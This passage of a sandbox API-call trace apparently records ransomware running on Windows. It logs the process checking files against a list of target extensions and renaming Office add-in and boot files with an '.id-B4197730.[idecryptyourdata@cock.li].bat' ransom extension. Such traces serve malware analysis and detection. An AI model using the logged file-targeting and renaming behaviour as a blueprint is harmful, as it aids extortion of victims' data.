add-in\\sr-latn-cs\\powerviewres.sr-latn-cs.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.846] CloseHandle (hObject=0x52c) returned 1 [0173.852] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.852] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sv\\PowerViewRes.sv.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sv\\powerviewres.sv.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.852] CloseHandle (hObject=0x52c) returned 1 [0173.860] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.083] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\th\\PowerViewRes.th.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\th\\powerviewres.th.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.534] CloseHandle (hObject=0x52c) returned 1 [0175.791] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fi\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fi\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.802] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fr\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fr\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.817] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\gl\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\gl\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.966] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hu\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hu\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hu\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hu\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.980] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\id\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\id\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\id\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\id\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.043] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\it\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\it\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\it\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\it\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0178.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703260 | out: hHeap=0x6a0000) returned 1 [0178.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b668 | out: hHeap=0x6a0000) returned 1 [0178.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74b7f8 | out: hHeap=0x6a0000) returned 1 [0178.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x75b800 | out: hHeap=0x6a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3b49020 | out: hHeap=0x6a0000) returned 1 [0178.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7032d8 | out: hHeap=0x6a0000) returned 1 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456d240 [0178.463] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456d240, Size=0x20) returned 0x458c240 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456d1e0 [0178.464] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456d1e0, Size=0x20) returned 0x458c448 [0178.464] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.464] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.464] Wow64DisableWow64FsRedirection (in: OldValue=0x307ff50 | out: OldValue=0x307ff50*=0x1) returned 1 [0178.464] lstrlenW (lpString="kernel32.dll") returned 12 [0178.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c448 | out: hHeap=0x6a0000) returned 1 [0178.465] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c240 | out: hHeap=0x6a0000) returned 1 Thread: id = 43 os_tid = 0xe78 [0155.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x76c0e8 [0155.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x77c0f0 [0155.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703338 [0155.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x73b5c8 [0155.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703350 [0155.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x3c59020 [0155.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703380 [0155.144] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703380, Size=0x20) returned 0x6ddf70 [0155.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703380 [0155.144] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703380, Size=0x20) returned 0x6dde80 [0155.144] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.144] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.144] Wow64DisableWow64FsRedirection (in: OldValue=0x317ff50 | out: OldValue=0x317ff50*=0x0) returned 1 [0155.144] lstrlenW (lpString="kernel32.dll") returned 12 [0155.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf70 | out: hHeap=0x6a0000) returned 1 [0155.144] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dde80 | out: hHeap=0x6a0000) returned 1 [0155.144] Sleep (dwMilliseconds=0x64) [0155.514] lstrcmpiW (lpString1=".MARKER", lpString2=".bat") returned 1 [0155.514] lstrlenW (lpString="$WINRE_BACKUP_PARTITION.MARKER") returned 30 [0155.514] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0155.517] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=0) returned 1 [0155.517] CloseHandle (hObject=0x34c) returned 1 [0155.517] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.517] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.518] lstrlenW (lpString=".doc") returned 4 [0155.518] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0155.518] lstrlenW (lpString=".docx") returned 5 [0155.518] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0155.518] lstrlenW (lpString=".pdf") returned 4 [0155.518] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0155.518] lstrlenW (lpString=".xls") returned 4 [0155.518] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0155.518] lstrlenW (lpString=".xlsx") returned 5 [0155.518] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0155.518] lstrlenW (lpString=".ppt") returned 4 [0155.518] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0155.518] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.518] lstrlenW (lpString=".zip") returned 4 [0155.518] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0155.518] lstrlenW (lpString=".rar") returned 4 [0155.518] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0155.518] lstrlenW (lpString=".bz2") returned 4 [0155.518] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0155.518] lstrlenW (lpString=".7z") returned 3 [0155.518] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0155.518] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.518] lstrlenW (lpString=".dbf") returned 4 [0155.518] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0155.518] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.518] lstrlenW (lpString=".1cd") returned 4 [0155.518] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0155.518] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.518] lstrlenW (lpString=".jpg") returned 4 [0155.518] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0155.519] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.519] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.519] lstrlenW (lpString=".doc") returned 4 [0155.519] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0155.519] lstrlenW (lpString=".docx") returned 5 [0155.519] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0155.519] lstrlenW (lpString=".pdf") returned 4 [0155.519] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0155.519] lstrlenW (lpString=".xls") returned 4 [0155.519] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0155.519] lstrlenW (lpString=".xlsx") returned 5 [0155.519] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0155.519] lstrlenW (lpString=".ppt") returned 4 [0155.519] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0155.519] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.519] lstrlenW (lpString=".zip") returned 4 [0155.519] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0155.519] lstrlenW (lpString=".rar") returned 4 [0155.519] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0155.519] lstrlenW (lpString=".bz2") returned 4 [0155.519] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0155.519] lstrlenW (lpString=".7z") returned 3 [0155.519] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0155.519] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.519] lstrlenW (lpString=".dbf") returned 4 [0155.519] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0155.519] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.519] lstrlenW (lpString=".1cd") returned 4 [0155.519] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0155.520] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0155.520] lstrlenW (lpString=".jpg") returned 4 [0155.520] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0155.520] Sleep (dwMilliseconds=0x64) [0155.780] Sleep (dwMilliseconds=0x64) [0156.294] Sleep (dwMilliseconds=0x64) [0156.925] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0156.925] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0156.925] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.925] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=76632) returned 1 [0156.925] CloseHandle (hObject=0x340) returned 1 [0156.926] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0156.926] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.064] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.065] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.065] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.065] lstrlenW (lpString=".doc") returned 4 [0157.065] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.065] lstrlenW (lpString=".docx") returned 5 [0157.065] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.065] lstrlenW (lpString=".pdf") returned 4 [0157.065] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.065] lstrlenW (lpString=".xls") returned 4 [0157.065] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.065] lstrlenW (lpString=".xlsx") returned 5 [0157.065] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.065] lstrlenW (lpString=".ppt") returned 4 [0157.065] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.065] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.065] lstrlenW (lpString=".zip") returned 4 [0157.065] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.065] lstrlenW (lpString=".rar") returned 4 [0157.065] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.065] lstrlenW (lpString=".bz2") returned 4 [0157.065] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.065] lstrlenW (lpString=".7z") returned 3 [0157.065] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.065] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.065] lstrlenW (lpString=".dbf") returned 4 [0157.065] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.065] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.065] lstrlenW (lpString=".1cd") returned 4 [0157.066] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.066] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.066] lstrlenW (lpString=".jpg") returned 4 [0157.066] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.066] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.066] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.066] lstrlenW (lpString=".doc") returned 4 [0157.066] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.066] lstrlenW (lpString=".docx") returned 5 [0157.066] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.066] lstrlenW (lpString=".pdf") returned 4 [0157.066] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.066] lstrlenW (lpString=".xls") returned 4 [0157.066] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.066] lstrlenW (lpString=".xlsx") returned 5 [0157.066] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.066] lstrlenW (lpString=".ppt") returned 4 [0157.066] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.066] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.066] lstrlenW (lpString=".zip") returned 4 [0157.066] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.066] lstrlenW (lpString=".rar") returned 4 [0157.066] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.066] lstrlenW (lpString=".bz2") returned 4 [0157.066] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.066] lstrlenW (lpString=".7z") returned 3 [0157.067] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.067] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.067] lstrlenW (lpString=".dbf") returned 4 [0157.067] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.067] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.067] lstrlenW (lpString=".1cd") returned 4 [0157.067] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.067] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0157.067] lstrlenW (lpString=".jpg") returned 4 [0157.067] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.067] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.067] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0157.067] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0157.068] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=80224) returned 1 [0157.068] CloseHandle (hObject=0x3ac) returned 1 [0157.068] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0157.068] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.068] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.069] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.069] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.069] lstrlenW (lpString=".doc") returned 4 [0157.069] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.069] lstrlenW (lpString=".docx") returned 5 [0157.069] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.069] lstrlenW (lpString=".pdf") returned 4 [0157.069] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.070] lstrlenW (lpString=".xls") returned 4 [0157.070] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.070] lstrlenW (lpString=".xlsx") returned 5 [0157.070] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.070] lstrlenW (lpString=".ppt") returned 4 [0157.070] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.070] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.070] lstrlenW (lpString=".zip") returned 4 [0157.070] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.070] lstrlenW (lpString=".rar") returned 4 [0157.070] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.070] lstrlenW (lpString=".bz2") returned 4 [0157.071] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.071] lstrlenW (lpString=".7z") returned 3 [0157.071] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.071] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.071] lstrlenW (lpString=".dbf") returned 4 [0157.071] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.071] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.071] lstrlenW (lpString=".1cd") returned 4 [0157.071] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.071] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.071] lstrlenW (lpString=".jpg") returned 4 [0157.071] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.072] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.072] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.072] lstrlenW (lpString=".doc") returned 4 [0157.072] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.072] lstrlenW (lpString=".docx") returned 5 [0157.072] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.072] lstrlenW (lpString=".pdf") returned 4 [0157.072] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.072] lstrlenW (lpString=".xls") returned 4 [0157.072] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.072] lstrlenW (lpString=".xlsx") returned 5 [0157.072] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.072] lstrlenW (lpString=".ppt") returned 4 [0157.073] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.073] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.073] lstrlenW (lpString=".zip") returned 4 [0157.073] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.073] lstrlenW (lpString=".rar") returned 4 [0157.073] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.073] lstrlenW (lpString=".bz2") returned 4 [0157.073] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.073] lstrlenW (lpString=".7z") returned 3 [0157.073] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.073] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.073] lstrlenW (lpString=".dbf") returned 4 [0157.073] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.073] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.073] lstrlenW (lpString=".1cd") returned 4 [0157.073] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.073] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0157.074] lstrlenW (lpString=".jpg") returned 4 [0157.074] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.074] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.074] lstrlenW (lpString="memtest.exe.mui") returned 15 [0157.074] CreateFileW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0157.074] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=46496) returned 1 [0157.075] CloseHandle (hObject=0x3ac) returned 1 [0157.075] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui")) returned 0x20 [0157.075] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.075] CreateFileW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" 